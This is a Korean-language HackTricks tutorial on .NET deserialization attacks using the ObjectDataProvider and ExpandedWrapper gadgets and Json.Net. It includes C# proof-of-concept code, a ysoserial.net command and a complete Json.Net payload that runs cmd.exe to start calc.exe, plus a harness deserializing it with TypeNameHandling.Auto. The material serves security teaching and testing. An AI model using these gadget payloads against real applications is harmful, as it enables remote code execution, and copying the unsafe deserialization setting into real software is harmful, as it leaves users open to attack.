Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)

htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 영웅까지 AWS 해킹 배우기 htARTE (HackTricks AWS Red Team Expert)!

사이버 보안 회사에서 일하시나요? 회사를 HackTricks에서 광고하고 싶으신가요? 또는 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? 구독 요금제를 확인해보세요!
The PEASS Family를 발견해보세요, 저희의 독점 NFT 컬렉션
공식 PEASS & HackTricks 스왹을 받아보세요
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦@carlospolopm를 팔로우하세요.
해킹 트릭을 공유하고 싶으시다면 hacktricks repo 및 hacktricks-cloud repo 로 PR을 제출해주세요.

이 게시물은 ObjectDataProvider 가젯이 어떻게 악용되어 RCE를 얻는지와 Serialization 라이브러리 Json.Net 및 xmlSerializer가 그 가젯과 함께 악용될 수 있는 방법을 이해하는 데 전념되어 있습니다.

ObjectDataProvider 가젯

문서에서: ObjectDataProvider 클래스는 바인딩 소스로 사용할 수 있는 객체를 래핑하고 생성합니다. 그래, 이상한 설명이죠. 그래서 이 클래스가 흥미로운 이유는 무엇인지 살펴봅시다: 이 클래스는 임의의 객체를 래핑하고, _MethodParameters_를 사용하여 임의의 매개변수를 설정하고, 그런 다음 MethodName을 사용하여 임의의 함수를 호출할 수 있습니다. 따라서, 임의의 객체는 역직렬화될 때 매개변수와 함께 함수를 실행할 것입니다.

이것이 어떻게 가능한가요

System.Windows.Data 네임스페이스는 PresentationFramework.dll에 있으며 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF에서 ObjectDataProvider가 정의되고 구현됩니다.

dnSpy를 사용하여 관심 있는 클래스의 코드를 검사할 수 있습니다. 아래 이미지에서 우리는 PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name의 코드를 보고 있습니다.

MethodName이 설정되면 base.Refresh()가 호출되는 것을 확인할 수 있습니다. 이것이 무엇을 하는지 살펴봅시다:

좋아요, this.BeginQuery()가 무엇을 하는지 계속 살펴봅시다. BeginQuery는 ObjectDataProvider에 의해 재정의되며 다음을 수행합니다:

코드 끝에서 this.QueryWorke(null)를 호출하는 것을 주목하세요. 이것이 무엇을 실행하는지 살펴봅시다:

이것이 QueryWorker 함수의 전체 코드는 아니지만, 그 중요한 부분을 보여줍니다: 코드는 this.InvokeMethodOnInstance(out ex);를 호출하는데, 이것이 설정된 메소드가 호출되는 라인입니다.

_MethodName_만 설정하면 실행된다는 것을 확인하고 싶다면, 다음 코드를 실행할 수 있습니다:

using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}

참고로 System.Windows.Data를 로드하기 위해 _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_을 추가해야 합니다.

ExpandedWrapper

이전 exploit을 사용하면 object가 ObjectDataProvider 인스턴스로 역직렬화될 경우가 있습니다 (예: DotNetDuke 취약점에서는 XmlSerializer를 사용하여 GetType을 사용하여 object가 역직렬화되었습니다). 그런 다음, ObjectDataProvider 인스턴스에 감싸인 object type에 대한 지식이 없을 것입니다 (Process 예를 들어). DotNetDuke 취약점에 대한 자세한 정보는 여기에서 확인할 수 있습니다.

이 클래스는 주어진 인스턴스에 캡슐화된 object types를 지정할 수 있습니다. 따라서, 이 클래스는 소스 object (ObjectDataProvider)를 새로운 object type으로 캡슐화하고 필요한 속성들을 제공할 수 있습니다 (ObjectDataProvider.MethodName 및 ObjectDataProvider.MethodParameters). 이전에 제시된 경우와 같이 매우 유용합니다. 왜냐하면 우리는 _ObjectDataProvider**를 **ExpandedWrapper _ 인스턴스 내부에 감쌀 수 있기 때문에 이 클래스가 역직렬화될 때 _MethodName_에 지정된 함수를 실행할 OjectDataProvider object를 생성할 수 있습니다.

다음 코드로 이 wrapper를 확인할 수 있습니다:

using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}

Json.Net

공식 웹 페이지에는 이 라이브러리가 Json.NET의 강력한 JSON 직렬화기를 사용하여 .NET 객체를 직렬화 및 역직렬화할 수 있다고 나와 있습니다. 따라서, 만약 우리가 ObjectDataProvider 가젯을 역직렬화할 수 있다면, 객체를 역직렬화함으로써 RCE를 유발할 수 있습니다.

Json.Net 예제

먼저 이 라이브러리를 사용하여 객체를 직렬화/역직렬화하는 예제를 살펴보겠습니다:

using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}

Json.Net 남용

ysoserial.net을 사용하여 exploit을 생성했습니다:

ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

이 코드에서 exploit을 테스트할 수 있습니다. 그냥 실행하면 calc가 실행되는 것을 볼 수 있습니다:

using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));

//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}

영웨이에 대한 제로부터 히어로까지의 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

사이버 보안 회사에서 일하시나요? HackTricks에 귀사를 광고하고 싶으신가요? 혹은 PEASS의 최신 버전에 액세스하거나 HackTricks를 PDF로 다운로드하고 싶으신가요? SUBSCRIPTION PLANS를 확인해보세요!
The PEASS Family를 발견하세요, 저희의 독점적인 NFTs 컬렉션
공식 PEASS & HackTricks 스웨그를 얻으세요
다음에 가입하세요 💬 Discord 그룹 혹은 텔레그램 그룹 또는 트위터에서 팔로우하세요 🐦@carlospolopm.
해킹 트릭을 공유하세요 hacktricks repo 및 hacktricks-cloud repo에 PR을 제출함으로써.

PreviousCommonsCollection1 Payload - Java Transformers to Rutime exec() and Thread Sleep NextExploiting __VIEWSTATE knowing the secrets

Last updated 3 days ago